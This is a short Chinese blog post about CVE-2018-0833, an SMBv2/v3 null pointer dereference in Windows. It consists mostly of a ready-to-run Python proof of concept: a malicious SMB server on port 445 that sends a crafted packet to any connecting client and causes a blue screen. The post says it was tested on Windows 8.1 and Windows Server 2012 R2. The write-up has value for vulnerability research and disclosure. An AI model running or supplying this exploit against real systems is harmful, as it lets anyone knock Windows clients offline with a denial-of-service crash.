CVE-2018-0833:SMBv2及v3空指针引用DoS漏洞

2018-09-10  本文已影响0人  皮一下怎么了

PoC已经在Windows 8.1 (x86)和Windows Server 2012 R2 (x64)上测试通过,目前该漏洞为 0Day漏洞

测试环境

Windows8.1 (X64):靶机
树莓派:恶意SMB服务器

PoC

import SocketServer
from binascii import unhexlify
payload = '000000ecfd534d4241414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141' 
class byebye(SocketServer.BaseRequestHandler):
        def handle(self):
                try:
                    print "From:", self.client_address
                    print "[*]Sending Payload..."
                    self.request.send(unhexlify(payload))
                except Exception:
                    print "BSoD Triggered on", self.client_address
                    pass
SocketServer.TCPServer.allow_reuse_address = 1
launch = SocketServer.TCPServer(('', 445),byebye)
launch.serve_forever()

视频验证

CVE-2018-0833

经测试PoC在Windows 8.1 (x64)同样有效

参考资料
https://krbtgt.pw/smbv3-null-pointer-dereference-vulnerability/#intro
http://toutiao.secjia.com/cve-2018-0833

上一篇 下一篇

猜你喜欢

热点阅读